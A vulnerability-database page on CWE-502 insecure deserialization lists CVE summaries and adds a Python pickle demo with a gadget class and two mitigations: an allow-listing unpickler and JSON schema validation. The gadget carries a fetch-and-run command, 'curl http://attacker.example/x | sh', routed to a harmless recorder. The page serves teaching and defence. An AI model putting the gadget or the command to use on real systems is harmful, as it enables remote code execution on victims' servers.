CWE-502: Deserialization of Untrusted Data
The product deserializes untrusted data without sufficiently verifying that the resulting data will be valid.
[Charts not reproduced here: Yearly Trend; Top Affected Vendors]
All Deserialization of Untrusted Data CVEs (998)
[May 14, 2025] The Uncanny Automator WordPress plugin contains a PHP object injection vulnerability that allows unauthenticated attackers to execute arbitrary code t...
[May 13, 2025] CVE-2025-42999 is a deserialization vulnerability in SAP NetWeaver Visual Composer Metadata Uploader that allows privileged users to upload malicious ...
[Apr 8, 2025] This CVE describes a deserialization vulnerability in Adobe ColdFusion that allows attackers to execute arbitrary code without user interaction. Syste...
[Jan 15, 2025] This CVE describes a fastjson deserialization vulnerability in MSFM that allows remote code execution by sending malicious payloads to the system/tabl...
[Jan 15, 2025] This vulnerability allows remote code execution through fastjson deserialization in MSFM's table editing component. Attackers can exploit this to exec...
[Nov 14, 2024] A deserialization vulnerability in Kibana allows authenticated attackers with specific Elasticsearch and Kibana privileges to execute arbitrary code b...
[Sep 6, 2024] This vulnerability in H2O.ai H2O allows attackers to set arbitrary JDBC URLs, leading to deserialization attacks, file reads, and remote code executio...
[Aug 30, 2024] The Events Calendar Pro WordPress plugin is vulnerable to PHP object injection through deserialization of untrusted input in the 'filters' parameter. ...
[Mar 6, 2024] This CVE describes a deserialization vulnerability in Apache InLong that allows attackers to read arbitrary files from the server. The vulnerability a...
[Feb 29, 2024] This CVE describes a deserialization vulnerability in Dataease's MySQL datasource component that allows attackers to bypass JDBC attack blacklists. Su...
[Jan 8, 2024] This CVE describes a PHP object injection vulnerability in the HTML5 MP3 Player with Folder Feedburner Playlist Free WordPress plugin. Attackers can e...
[Jan 8, 2024] This CVE describes a PHP object injection vulnerability in the HTML5 SoundCloud Player with Playlist Free WordPress plugin. Attackers can exploit dese...
[Jan 8, 2024] This vulnerability allows remote attackers to execute arbitrary code via PHP object injection through deserialization of untrusted data in the HTML5 M...
[Dec 31, 2023] This vulnerability allows attackers to execute arbitrary PHP code through insecure deserialization in the YITH WooCommerce Product Add-Ons plugin. It ...
[Oct 1, 2021] CVE-2021-41110 is a critical deserialization vulnerability in cwlviewer that allows remote code execution by parsing malicious YAML data. The vulnerab...
[May 11, 2021] CVE-2021-29508 is a deserialization vulnerability in Wire serialization library that allows attackers to execute arbitrary code by sending malicious p...
[Oct 28, 2025] This CVE describes a remote code execution vulnerability in Taiga project management platform due to unsafe deserialization of untrusted data in the A...
[Sep 9, 2025] This vulnerability allows unauthenticated attackers to execute arbitrary PHP code through deserialization of untrusted data in the Photography WordPre...
[Sep 3, 2025] This CVE describes a deserialization vulnerability in Sitecore Experience Manager (XM) and Experience Platform (XP) that allows attackers to inject an...
[Jul 11, 2025] This vulnerability allows authenticated users to execute arbitrary code remotely on affected systems by exploiting a flaw in the client-server communi...
[Jun 25, 2025] CVE-2025-36038 is a critical deserialization vulnerability in IBM WebSphere Application Server that allows remote attackers to execute arbitrary code ...
[Jun 2, 2025] CVE-2025-5086 is a deserialization vulnerability in Dassault Systèmes DELMIA Apriso that allows remote attackers to execute arbitrary code by sending...
[Mar 27, 2025] This vulnerability allows remote attackers to execute arbitrary code via PHP object injection in the Traveler WordPress theme. It affects WordPress si...
[Mar 19, 2025] CVE-2025-29783 is a remote code execution vulnerability in vLLM when configured with Mooncake for distributed key-value storage. Attackers can exploit...
[Feb 14, 2025] This vulnerability allows remote code execution on Apache Ignite servers by bypassing class serialization filters. Attackers can craft malicious messa...
[Sep 12, 2024] SolarWinds Access Rights Manager (ARM) contains a deserialization vulnerability (CWE-502) that allows authenticated users to execute arbitrary code re...
[Aug 19, 2024] CVE-2024-43252 is a PHP object injection vulnerability in the Crew HRM WordPress plugin that allows attackers to execute arbitrary code through deseri...
[Jun 13, 2024] This vulnerability allows unauthenticated attackers to perform PHP object injection via the recently_viewed_products cookie in the CoDesigner WooComme...
[May 30, 2024] An unsafe .NET object deserialization vulnerability in DELMIA Apriso allows attackers to execute arbitrary code without authentication. This affects a...
[May 14, 2024] This vulnerability allows authenticated users of SolarWinds Access Rights Manager to execute arbitrary code remotely on affected systems. Attackers wi...
[Apr 29, 2024] CVE-2024-33553 is an unauthenticated PHP object injection vulnerability in the XStore Core WordPress plugin. Attackers can exploit deserialization of ...
[Mar 28, 2024] CVE-2024-30223 is an unauthenticated PHP object injection vulnerability in the ARMember WordPress plugin. Attackers can exploit this by sending specia...
[Mar 28, 2024] This CVE describes a PHP object injection vulnerability in the INFINITUM FORM Geo Controller WordPress plugin due to insecure deserialization of untru...
[Oct 18, 2023] CVE-2023-45146 is a critical remote code execution vulnerability in XXL-RPC when configured with Netty and Hessian serialization. Attackers can send m...
[Sep 1, 2021] This vulnerability allows authenticated attackers to execute arbitrary code on SolarWinds Orion Platform servers through insecure deserialization. It ...
[Sep 1, 2021] This vulnerability allows remote code execution through deserialization of untrusted data in the SolarWinds Orion Patch Manager Web Console. An attack...
[Feb 20, 2026] This vulnerability allows remote authenticated attackers to bypass authentication and execute arbitrary code with SYSTEM privileges on GFI Archiver in...
[Feb 20, 2026] This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Dotstore Woocommerce Category Banner ...
[Feb 20, 2026] This CVE describes a PHP object injection vulnerability in the WordPress Slider Responsive Slideshow plugin, allowing attackers to execute arbitrary c...
[Feb 20, 2026] This CVE describes a PHP object injection vulnerability in the PeakShops WordPress theme caused by unsafe deserialization of user-controlled data. Att...
[Feb 20, 2026] This CVE describes a PHP object injection vulnerability in the Kleor Contact Manager WordPress plugin. Attackers can exploit insecure deserialization ...
[Feb 20, 2026] This CVE describes a PHP object injection vulnerability in the ModelTheme Addons for WPBakery and Elementor WordPress plugin. Attackers can exploit in...
[Feb 19, 2026] This CVE describes a PHP object injection vulnerability in the Valenti WordPress theme caused by unsafe deserialization of untrusted data. Attackers c...
[Feb 18, 2026] The Advanced AJAX Product Filters WordPress plugin is vulnerable to PHP object injection via deserialization of untrusted input in the Live Composer c...
[Feb 12, 2026] This vulnerability in Infoblox NIOS allows attackers to execute arbitrary code remotely through insecure deserialization. It affects all Infoblox NIOS...
[Feb 3, 2026] This vulnerability allows attackers to execute arbitrary code on WordPress sites running the vulnerable WpEvently plugin by exploiting insecure deseri...
[Jan 22, 2026] This vulnerability allows attackers to execute arbitrary code through PHP object injection by exploiting insecure deserialization in the North WordPre...
[Jan 22, 2026] This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Dental Care CPT WordPress plugin. Suc...
[Jan 22, 2026] This vulnerability allows attackers to inject malicious objects through deserialization of untrusted data in the Tech Life CPT WordPress plugin. Succe...
[Jan 22, 2026] This vulnerability allows remote attackers to execute arbitrary code through PHP object injection in the OneLife WordPress theme. Attackers can exploi...
About Deserialization of Untrusted Data (CWE-502)
Our database tracks 998 CVEs classified as CWE-502, with 484 rated critical and 458 rated high severity. The average CVSS score for Deserialization of Untrusted Data vulnerabilities is 8.8.
External reference: CWE-502 on MITRE CWE, https://cwe.mitre.org/data/definitions/502.html
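The definition above in working code, as an added example that is not from the page or from any project it lists. It uses Python's pickle, which behaves like the PHP unserialize(), Java ObjectInputStream, fastjson and Hessian deserializers in the entries above: the byte stream names a callable and the loader calls it while reconstructing the object graph. The Gadget class, the os_system_stand_in recorder (standing in for os.system so the demo has no side effects), the attacker command string and the {"user", "roles"} session shape are all constructed for this demonstration.

```python
import builtins
import io
import json
import pickle

# Hypothetical record of what the gadget made the "victim" run. A real gadget would
# name os.system or subprocess.Popen here; the recorder keeps the demo side-effect free.
EXECUTED = []


def os_system_stand_in(cmd):
    EXECUTED.append(cmd)
    return 0


class Gadget:
    """Attacker-side class. The victim never needs this class: the pickle stream only
    stores the callable and arguments returned by __reduce__, and the unpickler calls
    that callable during load(), before the application sees any result."""

    def __reduce__(self):
        return (os_system_stand_in, ("curl http://attacker.example/x | sh",))  # constructed


def build_payload():
    return pickle.dumps(Gadget(), protocol=4)


def load_session_vulnerable(blob):
    # CWE-502: attacker-controlled bytes go straight to the unpickler, so any importable
    # callable in the process runs with the application's privileges.
    return pickle.loads(blob)


# Mitigation 1: allow-list which globals the unpickler may resolve. This is the same idea
# as Java's ObjectInputFilter or fastjson's autoType allow-list. Deny-lists of known gadget
# classes are the kind of filter that several entries above show being bypassed.
SAFE_BUILTINS = {"dict", "list", "tuple", "set", "str", "int", "float", "bool"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        raise pickle.UnpicklingError(f"global {module}.{name} is not allowed")


def load_session_restricted(blob):
    return RestrictedUnpickler(io.BytesIO(blob)).load()


# Mitigation 2 (preferred for data crossing a trust boundary): a data-only format plus
# explicit validation of shape and types, so there is no object graph to abuse at all.
def load_session_json(text):
    data = json.loads(text)
    if not isinstance(data, dict) or set(data) != {"user", "roles"}:
        raise ValueError("unexpected session shape")
    if not isinstance(data["user"], str) or not all(isinstance(r, str) for r in data["roles"]):
        raise ValueError("unexpected field types")
    return data


def json_rejects(text):
    try:
        load_session_json(text)
    except ValueError:
        return True
    return False


def run_demo():
    EXECUTED.clear()
    payload = build_payload()
    vulnerable_result = load_session_vulnerable(payload)  # gadget fires inside loads()
    ran_on_victim = list(EXECUTED)
    try:
        load_session_restricted(payload)
        blocked = False
    except pickle.UnpicklingError:
        blocked = True
    legit = pickle.dumps({"user": "alice", "roles": ["editor"]}, protocol=4)
    return {
        "ran_on_victim": ran_on_victim,
        "vulnerable_returned": vulnerable_result,  # the stand-in's return value, not a session
        "restricted_blocked": blocked,
        "restricted_legit": load_session_restricted(legit),
        "json_legit": load_session_json('{"user": "alice", "roles": ["editor"]}'),
    }


if __name__ == "__main__":
    print(run_demo())
```

Running the demo shows the command recorded before load_session_vulnerable even returns, the same payload rejected by the allow-listing unpickler, and a plain dict of primitives still loading through it (pickling primitives emits no global references, so find_class is never consulted). The allow-list is only as good as its contents; for input from an unauthenticated cookie or request body, as in the WordPress entries above, the JSON path with schema checks is the safer default.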